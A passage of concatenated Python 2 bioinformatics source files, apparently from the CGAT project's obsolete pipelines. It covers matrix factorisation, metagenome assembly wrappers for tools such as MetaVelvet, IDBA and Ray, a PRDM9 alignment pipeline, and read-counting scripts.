gradH = dot(dot(W.T, W), H) - dot(W.T, V)
initgrad = norm(r_[gradW, gradH.T])
if log:
log.write('# init gradient norm %f\n# progress: ' % initgrad)
tolW = max(0.001, tol) * initgrad
tolH = tolW
converged = False
for iter in xrange(1, maxiter):
# stopping condition
projnorm = norm(r_[gradW[logical_or(gradW < 0, W > 0)],
gradH[logical_or(gradH < 0, H > 0)]])
if projnorm < tol * initgrad:
if log:
log.write("\n# converged\n")
converged = True
break
if time() - initt > timelimit:
if log:
log.write("\n# time limit reached\n")
converged = False
break
(W, gradW, iterW) = nlssubprob(V.T, H.T, W.T, tolW, 1000, log)
W = W.T
gradW = gradW.T
if iterW == 1:
tolW = 0.1 * tolW
(H, gradH, iterH) = nlssubprob(V, W, H, tolH, 1000, log)
if iterH == 1:
tolH = 0.1 * tolH
if log and iter % 10 == 0:
log.write('.')
log.flush()
else:
converged = False
if log:
log.write("\n# iteration limit reached\n")
if log:
log.write('# Iter = %d Final proj-grad norm %f\n' % (iter, projnorm))
return (converged, W, H)
def nlssubprob(V, W, Hinit, tol, maxiter, log=None):
"""
H, grad: output solution and gradient
iter: #iterations used
V, W: constant matrices
Hinit: initial solution
tol: stopping tolerance
maxiter: limit of iterations
"""
H = Hinit
WtV = dot(W.T, V)
WtW = dot(W.T, W)
alpha = 1
beta = 0.1
for iter in xrange(1, maxiter):
grad = dot(WtW, H) - WtV
projgrad = norm(grad[logical_or(grad < 0, H > 0)])
if projgrad < tol:
break
# search step size
for inner_iter in xrange(1, 20):
Hn = H - alpha * grad
Hn = where(Hn > 0, Hn, 0)
d = Hn - H
gradd = sum(grad * d)
dQd = sum(dot(WtW, d) * d)
suff_decr = 0.99 * gradd + 0.5 * dQd < 0
if inner_iter == 1:
decr_alpha = not suff_decr
Hp = H
if decr_alpha:
if suff_decr:
H = Hn
break
else:
alpha = alpha * beta
else:
if not suff_decr or (Hp == Hn).all():
H = Hp
break
else:
alpha = alpha / beta
Hp = Hn
if iter == maxiter:
if log:
log.write('# max iteration in nlssubprob\n')
return (H, grad, iter)
```
#### File: cgat/obsolete/PipelineGenomeAssembly.py
```python
import sys
import re
import os
import tempfile
import collections
import shutil
import gzip
import sqlite3
import CGAT.IOTools as IOTools
import CGAT.Pipeline as P
import CGAT.Experiment as E
import CGATPipelines.PipelineMapping as PipelineMapping
import CGAT.FastaIterator as FastaIterator
import CGAT.Fastq as Fastq
import glob
import collections
import CGATPipelines.PipelineTracks as PipelineTracks
import metaphlan_utils
import numpy as np
class Format:
'''
class for assessing formats
'''
def fileFormat(self, infile):
'''
return the file format for the short read data
can be one of
fasta
fastq
fasta.gz
fastq.gz
fasta.1.gz
'''
possible_formats = ["fasta", "fastq", "fasta.gz", "fastq.gz", "fasta.1.gz", "fastq.1.gz"]
format = None
for f in possible_formats:
if infile.endswith(f):
format = f
assert format, "file %s is not of correct format" % infile
return format
class PairedData(Format):
'''
class for assessing paired end data
'''
def __init__(self):
self.format = None
self.paired = False
self.paired_interleaved = False
self.paired_separate = False
def getTrack(self, infile):
'''
return the track for the file
'''
return P.snip(infile, ".%s" % self.fileFormat(infile))
def getFormat(self, infile):
self.format = self.fileFormat(infile)
return self.format
def checkPairedFile(self, infile):
'''
return if the paired-end data file
attached to the input file for first in pair reads
'''
format = self.getFormat(infile)
track = self.getTrack(infile)
read2 = track + ".fastq.2.gz"
assert len(glob.glob(read2)) > 0, "cannot find %s file for read 2 in the pair for %s" % (read2, infile)
return ("separate", read2)
def checkPairs(self, infile):
'''
Function to check if pairs exist interleaved
within a file. If not it will check for separate
files for the read pair
'''
format = self.getFormat(infile)
paired = False
inf = IOTools.openFile(infile)
pairs = set()
if format in ["fasta", "fasta.gz"]:
iterator = FastaIterator.iterator
elif format in ["fastq", "fastq.gz"]:
iterator = Fastq.iterate
elif format in ["fasta.1.gz", "fastq.1.gz"]:
return self.checkPairedFile(infile)
for record in iterator(inf):
# make sure there are not other "/" in the sequence name
seq_id = record.title.split("/")
assert len(seq_id) == 2, "cannot deal with this sequence name %s" % record.title
seq_id = seq_id[0]
if seq_id not in pairs:
pairs.add(seq_id)
else:
print "found pair for %s: %s" % (seq_id, record.title)
paired = "interleaved"
break
return paired
############################
# function for performing
# claculation of stats
############################
def contig_to_stats(contigs_file, stats_file, params):
'''
calculate descriptive stats for a set
of contigs / scaffolds
'''
PARAMS = params
if PARAMS["filter"]:
f = PARAMS["filter"]
else:
f = 0
# iterate over the contigs/scaffolds and return stats
number_of_scaffolds = 0
N = PARAMS["scaffold_n"]
scaffold_lengths = []
inf = open(contigs_file)
for record in FastaIterator.iterate(inf):
scaffold_length = len(list(record.sequence))
if scaffold_length >= f:
number_of_scaffolds += 1
scaffold_lengths.append(scaffold_length)
# mean, median and max contig/scaffold lengths
mean_length = np.mean(scaffold_lengths)
median_length = np.median(scaffold_lengths)
max_length = max(scaffold_lengths)
# iterate over contigs/scaffolds sorted by longest
# and caculate the NX
index = 0
cum_length = 0
total_length = sum(scaffold_lengths)
for length in sorted(scaffold_lengths, reverse = True):
while cum_length <= total_length*(float(N)/100):
index += 1
cum_length += length
# output the results
outf = open(stats_file, "w")
outf.write("nscaffolds\tscaffold_length\tN%i\tmedian_length\tmean_length\tmax_length\n" % N)
outf.write("%s\t%s\t%s\t%s\t%s\t%s\n" % (number_of_scaffolds, total_length, sorted(scaffold_lengths, reverse = True)[index], str(median_length), str(mean_length), str(max_length)))
###############################
###############################
###############################
def build_scaffold_lengths(contigs_file, outfile, params):
'''
output the distribution of scaffold lengths
'''
PARAMS = params
if PARAMS["filter"]:
f = PARAMS["filter"]
else:
f = 0
inf = open(contigs_file)
outf = open(outfile, "w")
outf.write("scaffold_name\tlength\n")
for record in FastaIterator.iterate(inf):
scaffold_length = len(list(record.sequence))
if scaffold_length > f:
# rename sequences if they have a space in them
outf.write("%s\t%i\n" % (record.title.replace(" ", "_"), scaffold_length))
outf.close()
############################
# general assembler class
############################
class Assembler(PairedData):
'''
general class for assembly algorithms
'''
def __init_(self):
self.kmer = 0
self.format = None
self.read_type = None
self.exp_cov = None
self.stats_file = None
self.compressed = False
##########################
# meta-velvet
##########################
class Metavelvet(Assembler):
'''
velvet single genome assembly software
'''
def build(self, infile):
'''
run velveth and velvetg
followed by meta-velvetg
'''
outdir = P.getTempDir()
format = self.getFormat(infile)
paired = self.checkPairs(infile)
if len(paired) > 1:
pair = paired[0]
files = " ".join([infile, paired[1]])
else:
pair = paired
files = infile
if format == "fastq.1.gz":
format = "fastq.gz"
metavelvet_dir = os.path.join(os.getcwd(), "metavelvet.dir")
track = self.getTrack(infile)
self.stats_file = track + ".stats.txt"
# velveth and velvetg have to be run to build hash tables and initial de bruijn graphs
statement = '''%%(velveth_executable)s %(outdir)s %%(kmer)i -%(format)s -shortPaired -%(pair)s %(files)s
; cd %(outdir)s; %%(velvetg_executable)s %(outdir)s -exp_cov auto -ins_length %%(velvetg_insert_length)i
; %%(metavelvet_executable)s %(outdir)s -ins_length %%(velvetg_insert_length)i
; mv %(outdir)s/Roadmaps %(metavelvet_dir)s/%(track)s.roadmaps
; gzip %(metavelvet_dir)s/%(track)s.roadmaps
; mv %(outdir)s/Sequences %(metavelvet_dir)s/%(track)s.sequences
; gzip %(metavelvet_dir)s/%(track)s.sequences
; mv %(outdir)s/Graph2 %(metavelvet_dir)s/%(track)s.graph2
; gzip %(metavelvet_dir)s/%(track)s.graph2
; mv %(outdir)s/meta-velvetg.contigs.fa %(metavelvet_dir)s/%(track)s.contigs.fa
; sed -i 's/in/_in/g' %(outdir)s/meta-velvetg.Graph2-stats.txt
; mv %(outdir)s/meta-velvetg.Graph2-stats.txt %(metavelvet_dir)s/%(track)s.stats.txt
; rm -rf %(outdir)s''' % locals()
return statement
##########################
# meta-idba
##########################
class Idba(Metavelvet):
'''
meta-idba contig assembler
'''
def preprocess(self, infile):
'''
fastq files need to be converted to fasta
and pairs need to be merged
'''
mtype = None
# check for paired end data either in the same file or in a separate file
# for each read - will need to be gunzipped
# check compression status
if infile.endswith(".gz"):
if len(self.checkPairs(infile)) > 1: # check for paired data in separate files
read1 = infile
read2 = self.checkPairs(infile)[1]
temp = P.getTempDir()
read1_new = os.path.join(temp, P.snip(infile, ".gz"))
read2_new = os.path.join(temp, P.snip(self.checkPairs(infile)[1], ".gz"))
zippy = """gunzip -c %(read1)s > %(read1_new)s
; gunzip -c %(read2)s > %(read2_new)s; """ % locals()
elif self.checkPairs == "interleaved":
infile_new = os.path.join(temp, P.snip(infile, ".gz"))
zippy = """gunzip -c %(infile)s > %(infile_new)s; """ % locals()
else:
zippy = ""
# only need to convert if the data are in fastq format
if self.getFormat(infile).find("fastq") != -1 and len(self.checkPairs(infile)) >1: # reads are fastq and paired in separate files
mtype = "--merge" # argument for conversion tool
elif self.getFormat(infile).find("fastq") != -1 and self.checkPairs(infile) == "interleaved": # reads are fastq and in the same file
mtype = "--paired" # argument for conversion tool
# build statement
if mtype: # the reads are paired end
if mtype == "--merge":
outf = P.snip(os.path.basename(read1_new), ".fastq.1") + ".fa"
statement = '''%(zippy)s
fq2fa %(mtype)s %(read1_new)s %(read2_new)s %(outf)s
''' % locals()
elif mtype == "--paired":
outf = P.snip(os.path.basename(infile_new), ".fastq") + ".fa"
statement = '''%(zippy)s
fq2fa %(mtype)s %(infile_new)s %(outf)s
rm -rf %(temp)s''' % locals()
else:
statement = None
return statement
def build(self, infile):
'''build statement for running idba
'''
track = self.getTrack(infile)
# create single fasta file if required (reads are fastq format)
if self.preprocess(infile):
inf = track + ".fa"
if not os.path.exists(inf):
statement = self.preprocess(infile)
job_options = " -l mem_free=30G"
to_cluster = True
P.run()
else:
inf = infile
# build statement
track = self.getTrack(infile)
outdir = "idba.dir"
data_options = ["%(idba_options)s"]
data_options = " ".join(data_options)
statement = '''%%(idba_executable)s -r %(inf)s -o %(outdir)s %(data_options)s
; mv idba.dir/scaffold.fa idba.dir/%(track)s.scaffold.fa''' % locals()
return statement
##########################
# Ray meta
##########################
class Ray(Idba):
'''
ray contig assembler
'''
def build(self, infile):
'''
build statement for running Ray
'''
track = self.getTrack(infile)
format = self.getFormat(infile)
paired = self.checkPairs(infile)
tempdir = P.getTempDir()
# check whether the data are paired-end
if len(paired) > 1:
pair = paired[0]
# Ray doesn't like .fastq.1.gz etc
read1 = infile
read2 = paired[1]
read1_new = os.path.join(tempdir,read1.replace(".fastq.1.gz", ".1.fastq"))
read2_new = os.path.join(tempdir,read2.replace(".fastq.2.gz", ".2.fastq"))
files = " ".join([read1_new, read2_new])
else:
pair = paired
files = infile
raydir = os.path.join(os.getcwd(), "ray.dir")
# Ray picks up file types so should just have to
# say whether its paired or not
print files
# build statement
common_options = "-k %(kmer)s"
if pair == "interleaved":
filetype = "-i"
elif not pair:
filetype = "-s"
elif pair == "separate":
filetype = "-p"
else:
raise IOError, "do not support file of this type: %s" % infile
statement = '''gunzip -c %(read1)s > %(read1_new)s
; gunzip -c %(read2)s > %(read2_new)s
; %%(ray_executable)s %(common_options)s %(filetype)s %(files)s -o %(raydir)s
; checkpoint; mv %(raydir)s/Scaffolds.fa %(raydir)s/%(track)s.scaffolds.fa
; mv %(raydir)s/ScaffoldComponents.txt %(raydir)s/%(track)s.scaffold_components.txt
; mv %(raydir)s/ScaffoldLengths.txt %(raydir)s/%(track)s.scaffold_lengths.txt
; mv %(raydir)s/ScaffoldLinks.txt %(raydir)s/%(track)s.scaffold_links.txt
; mv %(raydir)s/Contigs.fa %(raydir)s/%(track)s.contigs.fa#
; mv %(raydir)s/OutputNumbers.txt %(raydir)s/%(track)s.numbers.txt
; mv %(raydir)s/CoverageDistribution.txt %(raydir)s/graph/%(track)s.coverage_distribution.txt
; mkdir %(raydir)s/graph
; mv %(raydir)s/CoverageDistributionAnalysis.txt %(raydir)s/graph/%(track)s.coverage_distribution_analysis.txt
; mv %(raydir)s/degreeDistribution.txt %(raydir)s/graph/%(track)s.degree_distribution.txt
; mv %(raydir)s/Kmers.txt %(raydir)s/graph/%(track)s.kmers.txt
; mkdir %(raydir)s/assembly
; mv %(raydir)s/SeedLengthDistribution.txt %(raydir)s/assembly/%(track)s.seed_length_distribution.txt
; mv %(raydir)s/LibraryStatistics.txt %(raydir)s/%(track)s.library_statistics.txt
; mv %(raydir)s/LibraryData.xml %(raydir)s/%(track)s.library_data.xml
; rm -rf %(tempdir)s''' % locals()
return statement
##########################
# metaphlan
##########################
class Metaphlan(Idba):
'''
metphlan is more of an annotation tool
and therefore may be removed from this pipline
- however it is directly relevant for metagenome sequencing
'''
def build(self, infile, method="read_map"):
'''
build statement for running metaphlan
'''
track = self.getTrack(infile)
# create single fasta file if required (reads are fastq format)
inf = track + ".fa"
if not os.path.exists(inf):
job_options = " -l mem_free=30G"
to_cluster = True
if self.preprocess(infile):
statement = self.preprocess(infile)
P.run()
else:
inf = infile
if method == "read_map":
statement = '''cat %(inf)s
| python %%(scriptsdir)s/metaphlan.py -t reads_map
--input_type multifasta %%(method)s %%(metaphlan_db)s --no_map
| python %%(scriptsdir)s/metaphlan2table.py -t read_map
--log=%%(outfile)s.log
> %%(outfile)s''' % locals()
elif method == "rel_ab":
statement = '''cat %(inf)s
| python %%(scriptsdir)s/metaphlan.py -t rel_ab
--input_type multifasta %%(method)s %%(metaphlan_db)s --no_map
| python %%(scriptsdir)s/metaphlan2table.py -t rel_ab
--log=%%(outfile)s.log
> %%(outfile)s''' % locals()
else:
raise ValueError, "do not support method %s" % method
return statement
##########################
# cortex_var
##########################
class Cortex_var(Idba):
'''
cortex genome assembler
'''
def build(self,infile):
track = self.getTrack(infile)
format = self.getFormat(infile)
if format.endswith(".gz"):
format = P.snip(format, ".gz")
format = format.upper()
# cortex_var only uses paired end information to
# remove pcr duplicates
if not self.checkPairs(infile):
paired = "--se_list"
reads = os.path.join(os.getcwd(), infile)
elif len(self.checkPairs(infile)) > 1:
paired = "--pe_list"
read1 = infile
format = P.snip(format, ".1")
read2 = self.checkPairs(infile)[1]
elif self.checkPairs(infile) == "interleaved":
raise ValueError, "pipeline does not support file of type 'interleaved'"
temp = P.getTempDir()
read1_new = os.path.join(temp, P.snip(read1, ".1.gz"))
read2_new = os.path.join(temp, P.snip(read2, ".2.gz"))
# paired end list
list1 = open("cortex_var.dir/read1.txt", "w")
list2 = open("cortex_var.dir/read2.txt", "w")
list1.write(read1_new + "\n")
list2.write(read2_new + "\n")
list1.close()
list2.close()
list1 = os.path.abspath("cortex_var.dir/read1.txt")
list2 = os.path.abspath("cortex_var.dir/read2.txt")
reads = ",".join([os.path.join(os.getcwd(), x) for x in [read1_new, read2_new]])
statement = ''' gunzip -c %(read1)s > %(read1_new)s
; gunzip -c %(read2)s > %(read2_new)s
; cd cortex_var.dir
; %%(cortex_var_executable)s %(paired)s %(list1)s,%(list2)s
--format %(format)s
--mem_height 15
--quality_score_threshold %%(cortex_var_qual_threshold)i
--remove_pcr_duplicates
--remove_low_coverage_supernodes %%(cortex_var_rm_low_coverage_supernodes)i
--sample_id %(track)s
--kmer_size %%(kmer)s
--dump_binary dump_binary.ctx
; rm -rf %(temp)s
''' % locals()
return statement
```
#### File: cgat/obsolete/pipeline_prdm9.py
```python
from ruffus import *
import sys
import glob
import gzip
import os
import itertools
import CGAT.CSV as CSV
import re
import math
import types
import optparse
import shutil
import sqlite3
import CGAT.GFF as GFF
import CGAT.GTF as GTF
import CGAT.Experiment as E
import CGAT.Pipeline as P
import CGAT.IOTools as IOTools
import CGAT.Genomics as Genomics
import CGAT.Database as Database
import CGAT.FastaIterator as FastaIterator
import PipelineGeneset as PGeneset
import PipelineGO as PGO
import scipy.stats
import CGAT.Stats as Stats
import alignlib
import CGAT.Mali as Mali
PARAMS = P.getParameters()
@files( (("../data/znf.data", "profile.fasta" ) , ))
def createProfile( infile, outfile ):
'''convert mali to profile
'''
outfile = open(outfile, "w")
for line in open(infile):
if line.startswith("#"): continue
data = re.split("\s+", line[:-1],1)
print data
pid, sequence = data
outfile.write(">%s\n%s\n" % (pid, sequence ))
outfile.close()
def getParts( src ):
'''split a wrap-around alignment'''
result = None
r = []
last_s = src.getColTo()
for p in range( src.getRowFrom(),
src.getRowTo() ):
s = src.mapRowToCol(p)
if s < 0: continue
if last_s >= s:
if result:
r.append( result )
result = alignlib.makeAlignmentVector()
last_s = s
result.addPair( s, p, 0 )
if result:
r.append( result )
return r
def alignIndels( all_alleles, colcounts, extend_by = 0 ):
'''align all indel-regions.'''
aa = alignlib.makeAlignatorDPFull( alignlib.ALIGNMENT_LOCAL, 0, 0 )
alignator = alignlib.makeMultipleAlignatorSimple( aa)
ids = all_alleles.keys()
for x,c in enumerate(colcounts):
if c <= 1: continue
sequences = alignlib.StringVector()
for sid in ids:
for allele in all_alleles[sid]:
sequences.append( allele[x] )
mali = alignlib.makeMultAlignment()
alignator.align( mali, sequences )
realigned = []
for line in str(alignlib.MultAlignmentFormatPlain( mali, sequences )).split("\n")[:-1]:
data = line[:-1].split("\t")
realigned.append( data[1] )
assert len(realigned) == len(sequences)
l = max( [len(r) for r in realigned] )
i = 0
for sid in ids:
for allele in all_alleles[sid]:
if realigned[i]: allele[x] = realigned[i]
else: allele[x] = "-" * l
i += 1
colcounts[x] = l
def _alignToProfile( infile, outfile,
min_score = 0 ):
'''align sequences in *infile* against mali
Only alignments with a score higher than *min_score* are accepted.
Output multiple alignment in fasta format to *outfile* and a table
in :file:`outfile.log`.
'''
mali = Mali.Mali()
mali.readFromFile( open("../data/mouse.fasta") )
src_mali = Mali.convertMali2Alignlib( mali )
E.debug( "read mali: %i sequences x %i columns" % (mali.getNumSequences(), mali.getNumColumns() ))
# add pseudocounts
profile_mali = mali.getClone()
n = profile_mali.getNumColumns()
for x in "ACGT":
for y in range(0,2):
profile_mali.addSequence( "%s%i" % (x,y), 0, n, x * n )
profile_mali = Mali.convertMali2Alignlib( profile_mali )
alignlib.setDefaultEncoder( alignlib.getEncoder( alignlib.DNA4 ) )
alignlib.setDefaultLogOddor( alignlib.makeLogOddorUniform() )
# bg = alignlib.FrequencyVector()
# bg.extend( ( 0.3, 0.1, 0.2, 0.2, 0.2) )
# alignlib.setDefaultRegularizor( alignlib.makeRegularizorTatusov(
# alignlib.makeSubstitutionMatrixDNA4(),
# bg,
# "ACGTN",
# 10.0, 1.0) )
profile = alignlib.makeProfile( profile_mali )
alignment_mode = alignlib.ALIGNMENT_WRAP
alignator = alignlib.makeAlignatorDPFull( alignment_mode,
-5.0,
-0.5 )
map_seq2profile = alignlib.makeAlignmentVector()
map_rseq2profile = alignlib.makeAlignmentVector()
profile.prepare()
# print profile
build_mali = alignlib.makeMultAlignment()
m = alignlib.makeAlignmentVector()
m.addDiagonal( 0, n, 0 )
build_mali.add( src_mali, m )
outf = open( outfile, "w" )
outf_log = open( outfile + ".info", "w" )
outf_log.write( "read_id\tlength\tstart\tend\tparts\tcovered\tpcovered\tscore\tmali_start\tmali_end\tmali_covered\tmali_pcovered\n" )
sequences, aa = alignlib.StringVector(), alignlib.AlignandumVector()
ids = []
for pid in mali.getIdentifiers():
sequences.append( re.sub( "-", "", mali[pid] ) )
ids.append( pid )
# print str(alignlib.MultAlignmentFormatPlain( build_mali, sequences ))
c = E.Counter()
for s in FastaIterator.FastaIterator( open(infile)):
E.debug("adding %s" % s.title )
c.input += 1
rsequence = Genomics.complement(s.sequence)
seq = alignlib.makeSequence( s.sequence )
rseq = alignlib.makeSequence( rsequence )
alignator.align( map_seq2profile, seq, profile )
alignator.align( map_rseq2profile, rseq, profile )
if map_seq2profile.getScore() > map_rseq2profile.getScore():
m, seq, sequence = map_seq2profile, seq, s.sequence
else:
m, seq, sequence = map_rseq2profile, rseq, rsequence
if m.getLength() == 0:
c.skipped += 1
continue
if m.getScore() < min_score:
c.skipped += 1
continue
r = getParts( m )
covered = 0
for mm in r:
build_mali.add( mm )
sequences.append( sequence )
ids.append( s.title )
covered += mm.getLength() - mm.getNumGaps()
mali_covered = m.getColTo() - m.getColFrom()
outf_log.write( "\t".join( map(str, (
s.title,
len(s.sequence),
m.getRowFrom(),
m.getRowTo(),
len(r),
covered,
"%5.2f" % (100.0 * covered / len(s.sequence) ),
m.getScore(),
m.getColFrom(),
m.getColTo(),
mali_covered,
"%5.2f" % ((100.0 * mali_covered) / mali.getNumColumns())
) ) ) + "\n" )
c.output += 1
#build_mali.expand( aa )
result = str(alignlib.MultAlignmentFormatPlain( build_mali,
sequences,
alignlib.UnalignedStacked ))
for pid, data in zip(ids, result.split("\n") ):
start, sequence, end = data.split("\t")
outf.write(">%s/%i-%i\n%s\n" % (pid, int(start)+1, int(end), sequence) )
outf.close()
outf_log.close()
E.info( "%s\n" % str(c) )
@follows(createProfile)
@files( [ (x, "%s_%03i_na.mali" % (x[:-3],f), f)
for x,f in itertools.product( glob.glob("*.fa"), (0, 80 ) ) ] )
def alignToProfile( infile, outfile, threshold ):
_alignToProfile( infile, outfile, min_score = threshold )
@transform( alignToProfile
, suffix( ".mali")
, ".import" )
def importMaliStats( infile, outfile ):
'''import stats.'''
table = P.toTable( outfile ) + "_info"
statement = '''
python %(scriptsdir)s/csv2db.py %(csv2db_options)s
--index=read_id
--table=%(table)s
< %(infile)s.info
> %(outfile)s
'''
P.run()
@transform( alignToProfile
, suffix( "_na.mali")
, "_aa.mali" )
def buildMalisCodon( infile, outfile ):
'''build codon alignments
The frame is given by the master multiple alignment.
Sequences with indels that are not multiples of three
are removed.
Sequences with stop codons are removed.
TODO
'''
statement = '''
cat %(infile)s
| python %(scriptsdir)s/fasta2fasta.py --method=translate
| perl -p -e "s/[a-z]/-/g unless (/^>/)"
| python %(scriptsdir)s/mali2mali.py --method=remove-all-gaps --log=%(outfile)s.log --allow-duplicates
> %(outfile)s
'''
P.run()
@transform( alignToProfile
, suffix( "_na.mali")
, "_aa.mali" )
def buildMalisAA( infile, outfile ):
'''translate multiple alignments.
The frame is given by the master multiple alignment.
Indels in other sequences are ignored.
'''
statement = '''
cat %(infile)s
| perl -p -e "s/[a-z]/-/g unless (/^>/)"
| python %(scriptsdir)s/mali2mali.py --method=remove-all-gaps --log=%(outfile)s.log --allow-duplicates
| python %(scriptsdir)s/fasta2fasta.py --method=translate
> %(outfile)s
'''
P.run()
@transform( alignToProfile
, suffix( "_na.mali")
, "_na.columns" )
def computeColumnStatsNA( infile, outfile ):
'''compute stats per column.
Only columns are counted that are non-insert with respect to
the master alignment. The master alignment columns are
later removed in order to count only sequences within
a strain.
'''
statement = '''
cat %(infile)s
| perl -p -e "s/[a-z]/-/g unless (/^>/)"
| python %(scriptsdir)s/mali2mali.py --method=remove-all-gaps --log=%(outfile)s.log --allow-duplicates
| python %(scriptsdir)s/fasta2fasta.py --exclude="(^mouse)" --log=%(outfile)s.log
| python %(scriptsdir)s/mali2table.py --section=all --log=%(outfile)s.log --allow-duplicates
> %(outfile)s
'''
P.run()
@transform( buildMalisAA
, suffix( "_aa.mali")
, "_aa.columns" )
def computeColumnStatsAA( infile, outfile ):
'''compute stats per column.
Only columns are counted that are non-insert with respect to
the master alignment. The master alignment columns are
later removed.
'''
statement = '''
cat %(infile)s
| perl -p -e "s/[X?]/-/g unless (/^>/)"
| python %(scriptsdir)s/fasta2fasta.py --exclude="(^mouse)" --log=%(outfile)s.log
| python %(scriptsdir)s/mali2table.py --section=all --log=%(outfile)s.log --allow-duplicates --alphabet=aa
> %(outfile)s
'''
P.run()
@transform( (computeColumnStatsNA, computeColumnStatsAA)
, suffix( ".columns")
, "_columns.import" )
def importColumnStats( infile, outfile ):
'''import stats.'''
table = P.toTable( outfile )
statement = '''
python %(scriptsdir)s/csv2db.py %(csv2db_options)s
--index=column
--table=%(table)s
< %(infile)s
> %(outfile)s
'''
P.run()
@follows( alignToProfile
, importMaliStats
, computeColumnStatsNA
, buildMalisAA
, computeColumnStatsAA
, importColumnStats
)
def full(): pass
if __name__== "__main__":
sys.exit( P.main(sys.argv) )
```
#### File: obsolete/pipeline_rmaa/basic_headers.py
```python
from subprocess import Popen, PIPE
import os
from time import sleep
import commands
def run_cmd(my_cmd):
p=Popen(my_cmd, shell=True, stdin = PIPE, stderr = PIPE)
p.stdin.close()
output=p.stderr.read()
sts = os.waitpid(p.pid, 0)
if 'error' in output:
print "could not contact SGE, retrying resubmission in 5 seconds"
print my_cmd
sleep(5)
run_cmd(my_cmd)
return
def run_cmd_output(my_cmd):
p=Popen(my_cmd, shell=True, stdin = PIPE, stdout = PIPE, stderr = PIPE)
p.stdin.close()
output=p.stdout.read()
eout=p.stderr.read()
sts = os.waitpid(p.pid, 0)
if 'error' in eout:
print "could not contact SGE, retrying resubmission in 5 seconds"
print my_cmd
sleep(5)
output=run_cmd_output(my_cmd)
return output
def run_cmd_qsub(my_cmd):
while True:
sleep(5)
if 'has been submitted' in commands.getoutput(my_cmd):
break
return
```
#### File: obsolete/pipeline_rmaa/build_adjusted_counts.py
```python
import sys, optparse, re, os
import numpy
import Experiment as E
def main( argv = None ):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if not argv: argv = sys.argv
# setup command line parser
parser = optparse.OptionParser( version = "%prog version: $Id: script_template.py 2871 2010-03-03 10:20:44Z andreas $",
usage = globals()["__doc__"] )
options, args = E.Start()
ratios_file=open(args[0],'w')
samples=args[1:]
# first read in all values
gene_dict={}
for sample in samples:
numgenes=0
gene_dict[sample]=[]
other_gene_info=[]
for line in open(sample,'r'):
if line.startswith("#"): continue
if line.startswith("gene_id"): continue
la=line.rstrip('\n').split('\t')
if not len(la)==3: # for example, when qsub spits something dumb out
continue
other_gene_info.append((la[0],la[2]))
gene_dict[sample].append(int(la[1]))
numgenes+=1
# then sum all samples and calculate ratios
ratio_dict={}
for sample in samples: # initialize ratios dicts
ratio_dict[sample]=[]
for gene_idx in range(numgenes):
totreads=0
for sample in samples:
totreads+=gene_dict[sample][gene_idx]
for sample in samples:
if totreads==0: continue
ratio=gene_dict[sample][gene_idx]/float(totreads)
ratio_dict[sample].append(ratio)
# find median ratio for each and print the header
med_ratio=[]
my_str="gene_id\tlength\t"
my_str2=""
for sample in samples:
my_str+=sample.rsplit('/',1)[1].split('.')[0]+'\t'
my_str2 += sample.rsplit('/',1)[1].split('.')[0] + '\t'
ratio_dict[sample].sort()
med = float(numpy.median(ratio_dict[sample]))
if med == 0.0:
E.warn( "median ratio is 0 in %s - added small amount" % sample )
med += 0.00001
med_ratio.append( med )
print my_str.rstrip('\t')
ratios_file.write( my_str2.rstrip('\t') + '\n' )
smallest_ratio=min(med_ratio)
my_str2=""
for index, sample in enumerate(samples):
try:
my_str2 += str( smallest_ratio/med_ratio[index] ) + '\t'
except ZeroDivisionError:
my_str2 += 'na\t'
ratios_file.write( my_str2.rstrip('\t') )
# identify the smallest median ratio; correct all counts and prints out data from all samples...
for gene_idx in range(numgenes):
my_str=other_gene_info[gene_idx][0]+'\t'+other_gene_info[gene_idx][1]+'\t'
for index, sample in enumerate(samples):
try:
my_str+=str(gene_dict[sample][gene_idx]*smallest_ratio/med_ratio[index]) + '\t'
except ZeroDivisionError:
my_str += 'na\t'
print my_str.rstrip('\t')
"""
files=[]
for index, sample in samples:
files.append(open(sample,'r'))
for line in file[0]:
la=line.rstrip('\n').split('\t')
gene_name=la[0]
my_str=gene_name + '\t' + str( float(la[1])*smallest_ratio/med_ratio[0] )
for each in files[1::]:
each.readline()
output.write(my_str)
"""
E.Stop()
if __name__ == "__main__":
sys.exit( main( sys.argv) )
```
#### File: obsolete/pipeline_rmaa/count_reads_in_genes.py
```python
import sys, optparse, itertools
import pysam
import Bed, IOTools
import Experiment as E
def main( argv = None ):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if not argv: argv = sys.argv
# setup command line parser
parser = optparse.OptionParser( version = "%prog version: $Id: script_template.py 2871 2010-03-03 10:20:44Z andreas $",
usage = globals()["__doc__"] )
## add common options (-h/--help, ...) and parse command line
(options, args) = E.Start( parser, argv = argv )
coords_file=args[0]
bamfile=pysam.Samfile( args[1], 'rb' ) # bamfile
options.stdout.write( "gene_id\tcounts\tlength\n" )
iter = Bed.iterator( IOTools.openFile( coords_file ) )
for gene_id, exons in itertools.groupby( iter, lambda x: x.name ):
num_reads=0
anames=set([])
lgene = 0
for bed in exons:
lgene += bed.end - bed.start
for alignedread in bamfile.fetch(bed.contig, bed.start, bed.end):
anames.add((alignedread.qname, alignedread.is_read1))
num_reads = len(anames)
options.stdout.write( "\t".join( (gene_id,
str(num_reads),
str(lgene ) )) + "\n" )
## write footer and output benchmark information.
E.Stop()
if __name__ == "__main__":
sys.exit( main( sys.argv) )
```
#### File: obsolete/pipeline_rmaa/make_intervals.py
```python
import interval
from sys import argv
from commands import getstatusoutput
ens_gtf_name = argv[1]
cuff_name = argv[2]
ens_gtf = open(ens_gtf_name,'r')
cuff = open(cuff_name,'r')
# get all chrom names
(status, output) = getstatusoutput("cat %s | awk '{ print $1 }' | sort | uniq" % ens_gtf_name )
if not status == 0:
print "ERROR, CANNOT GET CHROM NAMES"
sys.exit(2)
chroms = output.rstrip('\n').split('\n')
# initiate all categories as dictionaries of interval sets (chrom names are keys)
#CDS = pc_exons = cuff_exons = cuff_introns = other_ens = genic = intergenic = dict.fromkeys(chroms, interval.IntervalSet([]))
CDS = dict.fromkeys(chroms, interval()); pc_exons = dict.fromkeys(chroms, interval()); cuff_exons = dict.fromkeys(chroms, interval())
cuff_introns = dict.fromkeys(chroms, interval()); other_ens = dict.fromkeys(chroms, interval()); genic = dict.fromkeys(chroms, interval())
intergenic = dict.fromkeys(chroms, interval()); intronic = dict.fromkeys(chroms, interval())
# CDS: set of all protein-coding sequence
# pc_exons: set of all protein-coding exons (subtract CDS to get UTRs)
# other_ens: other Ensembl annotations
